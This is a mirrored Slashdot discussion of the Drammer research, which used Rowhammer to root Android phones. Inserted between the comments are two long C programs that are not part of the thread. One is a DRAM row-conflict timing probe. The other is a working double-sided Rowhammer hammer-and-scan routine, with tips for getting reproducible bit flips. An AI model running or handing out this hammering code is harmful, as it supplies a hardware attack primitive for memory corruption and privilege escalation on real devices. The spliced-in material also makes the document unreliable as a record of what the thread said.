Slashdot Mirror


Rowhammer Attack Can Now Root Android Devices (softpedia.com)

An anonymous reader writes from a report via Softpedia: Researchers have discovered a method to use the Rowhammer RAM attack for rooting Android devices. For their research paper, called Drammer: Deterministic Rowhammer Attacks on Mobile Platforms, researchers tested and found multiple smartphone models to be vulnerable to their attack. The list includes LG Nexus (4, 5, 5X), LG G4, Motorola Moto G (2013 and 2014), OnePlus One, HTC Desire 510, Lenovo K3 Note, Xiaomi Mi 4i, and Samsung Galaxy (S4, S5, and S6) devices. Researchers estimate that millions of Android users might be vulnerable. The research team says the Drammer attack has far more wide-reaching implications than just Android, being able to exploit any device running on ARM chips. In the past, researchers have tested the Rowhammer attack against DDR3 and DDR4 memory cards, weaponized it via JavaScript, taken over PCs via Microsoft Edge, and hijacked Linux virtual machines. There's an app to test if your phone is vulnerable to this attack. "Rowhammer is an unintended side effect in dynamic random-access memory (DRAM) that causes memory cells to leak their charges and interact electrically between themselves, possibly altering the contents of nearby memory rows that were not addressed in the original memory access," according to Wikipedia. "This circumvention of the isolation between DRAM memory cells results from the high cell density in modern DRAM, and can be triggered by specially crafted memory access patterns that rapidly activate the same memory rows numerous times."


  1. I don't understand by TheRaven64 · · Score: 5, Interesting

    One of the simplest existing known attacks involves creating an 8MB TypedArray object in JavaScript. This gives you a contiguous virtual address range, which allows you to generate 9 addresses that will be aliased to the same cache line and therefore where 9 sequential writes will trigger an eviction and a write back to RAM. What made this attack now work on mobile devices?

    --
    I am TheRaven on Soylent News
    1. Re:I don't understand by Gravis+Zero · · Score: 4, Informative

      One of the simplest existing known attacks involves [...]. What made this attack now work on mobile devices?

      Surprise, they didn't do it that way!

      It was previously "speculated that Rowhammer on ARM could be impossible, one of the main reasons being that the ARM memory controller might be too slow to trigger the Rowhammer bug" which is true in most cases like the one you listed. However, one thing they figured out is that they could use DMA buffers that "bypass the CPU and its caches" using Android's DMA Buffer Management API.

      They did several other things like figure out how to determine the size of the DRAM rows (not uniform on ARM) and create a deterministic way to force security-sensitive data into vulnerable rows in a deterministic fashion.

      You can read the paper that describes it here: https://vvdveen.com/publications/drammer.pdf

      TL;DR: They are smart and if your Android phone isn't getting the latest patches then you are vulnerable to total pwn4g3 from anything in the Google Play Store until Google figures out how to scan for apps that will perform this attack.

      --
      Anons need not reply. Questions end with a question mark.
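An added example, not code from the thread, the commenter, or the Drammer paper: the row-buffer-conflict timing side channel that can be used to probe DRAM geometry such as the row size when the SoC does not document it (the approach Pessl et al. used in their DRAMA work; Drammer's own row-size procedure is in the linked PDF). Two addresses in the same bank but in different rows force the bank to precharge and re-open a row on every alternation, so reading the pair from DRAM is measurably slower than reading two lines in the same row. All names are hypothetical, the 25% conflict threshold is an assumption to calibrate per device, and the sweep runs over virtual distances in an ordinary malloc buffer, which is exactly the limitation Drammer removed with physically contiguous, uncached ION DMA memory: without it there is no user-space cache flush on ARM Linux, so `flush_line` is a no-op off x86 and the measurement is best-effort there.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#define ROUNDS    1000             /* samples per address pair */
#define PROBE_BUF (8u << 20)       /* 8 MiB probe buffer (ordinary, not DMA) */
#define LINE      64               /* assumed cache line size */

/* Cycle counter on x86-64; nanoseconds elsewhere (coarser, but it is what
 * unprivileged ARM user space has). */
static inline uint64_t now_ticks(void)
{
#if defined(__x86_64__)
    uint32_t lo, hi;
    __asm__ volatile("lfence\n\trdtsc" : "=a"(lo), "=d"(hi) : : "memory");
    return ((uint64_t)hi << 32) | lo;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* Evict one line so the next read is served from DRAM. Only x86 exposes a
 * user-space flush; Drammer got uncached access on ARM via ION DMA buffers. */
static inline void flush_line(const void *p)
{
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(p) : "memory");
#else
    (void)p;
#endif
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Median of v[0..n), sorting v in place; robust against interrupts/noise. */
uint64_t median_u64(uint64_t *v, size_t n)
{
    qsort(v, n, sizeof *v, cmp_u64);
    return v[n / 2];
}

/* Median time to read a and then b, both flushed first. Same bank but a
 * different row means the bank has to close a's row and open b's: slow. */
uint64_t pair_latency(const uint8_t *a, const uint8_t *b)
{
    static uint64_t t[ROUNDS];
    volatile uint8_t sink = 0;
    for (size_t r = 0; r < ROUNDS; r++) {
        flush_line(a);
        flush_line(b);
        uint64_t t0 = now_ticks();
        sink += *(volatile const uint8_t *)a;
        sink += *(volatile const uint8_t *)b;
        t[r] = now_ticks() - t0;
    }
    (void)sink;
    return median_u64(t, ROUNDS);
}

/* Assumption: a pair is a row-buffer conflict when it is >25% slower than
 * the same-row baseline. Calibrate on the device under test. */
int is_conflict(uint64_t latency, uint64_t baseline)
{
    return latency > baseline + baseline / 4;
}

/* Smallest distance in dist[] whose latency is a conflict, or 0 if none. */
size_t first_conflict_distance(const uint64_t *lat, const size_t *dist,
                               size_t n, uint64_t baseline)
{
    for (size_t i = 0; i < n; i++)
        if (is_conflict(lat[i], baseline))
            return dist[i];
    return 0;
}

int main(void)
{
    uint8_t *buf = malloc(PROBE_BUF);
    if (!buf) return 1;
    memset(buf, 1, PROBE_BUF);
    /* Baseline: two lines 64 B apart share a row, so no conflict. */
    uint64_t baseline = pair_latency(buf, buf + LINE);

    enum { N = 11 };
    size_t dist[N]; uint64_t lat[N];
    for (size_t i = 0; i < N; i++) {
        dist[i] = (size_t)4096 << i;               /* 4 KiB .. 4 MiB */
        lat[i] = pair_latency(buf, buf + dist[i]);
        printf("distance %8zu: %6llu ticks %s\n", dist[i],
               (unsigned long long)lat[i], is_conflict(lat[i], baseline) ? "CONFLICT" : "");
    }
    printf("baseline %llu, first conflicting distance %zu\n",
           (unsigned long long)baseline, first_conflict_distance(lat, dist, N, baseline));
    free(buf);
    return 0;
}
```

The spacing of the conflicting distances, together with the bank/row mapping of the controller, is what gives you the row size; on a real target you would run the sweep over a physically contiguous buffer, since virtual distances through 4 KiB pages only loosely track physical ones.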
    2. Re:I don't understand by frovingslosh · · Score: 2

      What I don't understand is if this attack is able to root so many different Android systems, why is it still so hard for the device's owner who wants to root his device to actually root it?

      --
      I'm an American. I love this country and the freedoms that we used to have.
  2. Oh dear, more military terminology by Viol8 · · Score: 2, Insightful

    A bunch of pasty faced sad sack nerds sitting in a basement want to sound cool and tough, like they've just done a tour in 'Nam. So they don't say "enabled" by javascript, no no no, it's "weaponised" with "attack vectors" instead of flaws or holes. It's just so lame and wannabe.

    1. Re:Oh dear, more military terminology by 110010001000 · · Score: 2

      Also the term "researchers" is dubious. What a waste of time this junk is.

    2. Re: Oh dear, more military terminology by DNS-and-BIND · · Score: 2

      We don't say "'Nam" any more, Grandpa. Moreover it's the marketroids that come up with these names, not the techies. And seriously, nerd-shaming, on Slashdot? Turn in your geek card, it's revoked by unanimous popular consent.

      --
      Shutting down free speech with violence isn't fighting fascism. It IS fascism!
  3. Phew, my Galaxy Note 7 is safe! by Anonymous Coward · · Score: 3, Funny

    Lucky I upgra

    1. Re:Phew, my Galaxy Note 7 is safe! by mlw4428 · · Score: 2

      He's just joking. Not every Galaxy Note 7 is having these issues, in fact I just plugged mine in and as you can see it hasn't exp

  4. Re:Bug of feature? by peragrin · · Score: 5, Funny

    don't worry they are working on a JavaScript version.

    That way they can root your device on the web and load the advertising directly to all of your contacts.

    oh wait that's called Facebook.

    --
    i thought once I was found, but it was only a dream.
  5. Re:Bug of feature? by TheRaven64 · · Score: 5, Informative

    Rowhammer has been usable from JavaScript for ages. As I said above (in the post currently at 0 overrated), one of the published ways of exploiting it is to use TypedArray objects to get a large chunk of contiguous memory, which then gives you a load of addresses in the same cache associativity set. You then hammer those addresses, which forces repeated cache evictions and eventually flips some adjacent bits. You can then use this to escape from the JavaScript sandbox. I don't know why this attack wouldn't work on mobile devices, so I don't really see what's new here.

    --
    I am TheRaven on Soylent News
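An added example, not code from the thread, the commenter, or the Drammer paper: the three pieces the two TheRaven64 comments describe, in C. `build_eviction_set()` is the TypedArray trick, picking addresses inside one contiguous buffer that alias to the same cache set; `hammer()` writes the two aggressor rows that sandwich a victim row and forces each write out to DRAM (clflush on x86, a read sweep over the eviction set elsewhere); `count_bit_flips()` scans the victim row for corruption. The cache geometry (`WAYS`, `SET_STRIDE`), the row size, and the idea that virtual contiguity maps onto DRAM rows are all assumptions, and that last one is exactly the gap Drammer closed on ARM: uncached, physically contiguous ION DMA buffers replace the eviction-set dance and the guesswork about rows, which this example does not have.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed cache geometry (differs per SoC): a WAYS-way set-associative cache
 * in which addresses SET_STRIDE bytes apart map to the same set
 * (SET_STRIDE = line size * number of sets, e.g. 64 B * 2048 sets).
 * ROW_SIZE is an assumed DRAM row size; Drammer found it varies on ARM. */
#define WAYS         16
#define SET_STRIDE   (128 * 1024)
#define EVICT_N      (WAYS + 1)      /* one more than the ways forces an eviction */
#define ROW_SIZE     (64 * 1024)
#define BUF_SIZE     (4u << 20)
#define LINE         64
#define HAMMER_ITERS 1000000UL

/* Fill out[] with EVICT_N addresses inside [base, base+len) that alias to
 * the same cache set as base: one contiguous (virtual) buffer gives every
 * address needed. Returns EVICT_N, or 0 if the buffer is too small. Virtual
 * contiguity only guarantees aliasing in a virtually indexed cache; for a
 * physically indexed L2 it is a bet. */
size_t build_eviction_set(uint8_t *base, size_t len, uint8_t **out)
{
    for (size_t i = 0; i < EVICT_N; i++) {
        size_t off = i * SET_STRIDE;
        if (off + LINE > len)
            return 0;
        out[i] = base + off;
    }
    return EVICT_N;
}

/* Push the line holding set[0] out of the cache so dirty data reaches DRAM.
 * x86 has clflush; elsewhere read the other EVICT_N-1 members of the set,
 * which evicts set[0] under an LRU-like policy. Reads only, so nothing else
 * in the buffer is modified. This read sweep is the slow path that made
 * people doubt Rowhammer on ARM; ION DMA buffers skip the cache entirely. */
static void evict_line(uint8_t **set)
{
#if defined(__x86_64__) || defined(__i386__)
    __asm__ volatile("clflush (%0)" : : "r"(set[0]) : "memory");
#else
    volatile uint8_t sink = 0;
    for (size_t i = 1; i < EVICT_N; i++)
        sink ^= *(volatile uint8_t *)set[i];
    (void)sink;
#endif
}

/* Double-sided hammer: alternately write the two aggressor rows that
 * sandwich the victim row, forcing every write to DRAM. */
void hammer(uint8_t **aggr1, uint8_t **aggr2, unsigned long iters)
{
    for (unsigned long i = 0; i < iters; i++) {
        *(volatile uint8_t *)aggr1[0] = 0xFF; evict_line(aggr1);
        *(volatile uint8_t *)aggr2[0] = 0xFF; evict_line(aggr2);
    }
}

/* Count bits in victim[] that differ from the fill pattern; print the first few. */
size_t count_bit_flips(const uint8_t *victim, size_t len, uint8_t pattern)
{
    size_t flips = 0;
    for (size_t i = 0; i < len; i++) {
        uint8_t diff = victim[i] ^ pattern;
        if (diff) {
            if (flips < 8)
                printf("flip at +%zu: %02x -> %02x\n", i, pattern, victim[i]);
            flips += (size_t)__builtin_popcount(diff);
        }
    }
    return flips;
}

int main(void)
{
    /* Row-aligned virtual buffer; rows are physical, so row 0/1/2 below is a
     * guess unless the memory is physically contiguous (Drammer: ION). */
    uint8_t *raw = malloc(BUF_SIZE + ROW_SIZE);
    if (!raw) return 1;
    uint8_t *buf = (uint8_t *)(((uintptr_t)raw + ROW_SIZE - 1) & ~(uintptr_t)(ROW_SIZE - 1));
    uint8_t *victim = buf + ROW_SIZE;                     /* row 1 */
    const uint8_t pattern = 0x55;
    memset(buf, pattern, BUF_SIZE);

    uint8_t *ev1[EVICT_N], *ev2[EVICT_N];
    if (!build_eviction_set(buf, BUF_SIZE, ev1) ||                                  /* row 0 */
        !build_eviction_set(buf + 2 * ROW_SIZE, BUF_SIZE - 2 * ROW_SIZE, ev2))      /* row 2 */
        return 1;

    hammer(ev1, ev2, HAMMER_ITERS);

    /* Read the victim from DRAM, not from stale cache lines. */
    for (size_t off = 0; off < ROW_SIZE; off += LINE) {
        uint8_t *line_set[EVICT_N];
        if (build_eviction_set(victim + off, BUF_SIZE - ROW_SIZE - off, line_set))
            evict_line(line_set);
    }
    printf("%zu flipped bits in the victim row\n", count_bit_flips(victim, ROW_SIZE, pattern));
    free(raw);
    return 0;
}
```

Zero flips is the normal result on a non-vulnerable module or when the virtual layout does not land on neighbouring physical rows; a real test harness sweeps many aggressor pairs and both fill patterns (0x55 and 0xAA) and records which bit offsets flip, because a flip that can be reproduced at a known offset is what the deterministic placement step in Drammer builds on.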
  6. hardware fix by sxpert · · Score: 2

    time to implement ECC everywhere, period !
    it's not like ram is expensive anymore

  7. Re:Bugger! by TheCarp · · Score: 2

    While you are correct, I must confess.... My first reaction to this was "Oh good, you mean I can root my phone that I bought with my money now"

    As much as I hate the implications of this.... and I do.... I also hate that I own a device that is functionally crippled and unable to run many of the apps I would like to run.

    Funny ecosystem we have eh?

    --
    "I opened my eyes, and everything went dark again"
  8. Re:Bug of feature? by TheRaven64 · · Score: 2

    Uh, no. All RowHammer attacks use a hardware vulnerability. That's the definition. The JavaScript attack allows you to exploit this vulnerability from a bug-free JavaScript VM, with the only requirement being that it implements TypedArray objects as contiguous (virtual) memory arrays (which is the obvious way of implementing them, and it would be difficult to implement them usefully any other way if you want to use them with WebGL). The only variation is which bits you choose to try to flip with the RowHammer attack. This is the equivalent of running a different program with a known attack, not a new attack.

    --
    I am TheRaven on Soylent News
  9. Re:Researchers? by Gravis+Zero · · Score: 3, Funny

    Can we stop calling these fucktards researchers already? They are crackers not researchers damn!

    Yeah, I mean, researchers explain their methodology and publish papers about it! These are just the dumbest criminal hackers that put their names on some paper they published! Can't wait until they go to jail for their criminal deeds which they are obviously waiting to do in the future! -_-

    --
    Anons need not reply. Questions end with a question mark.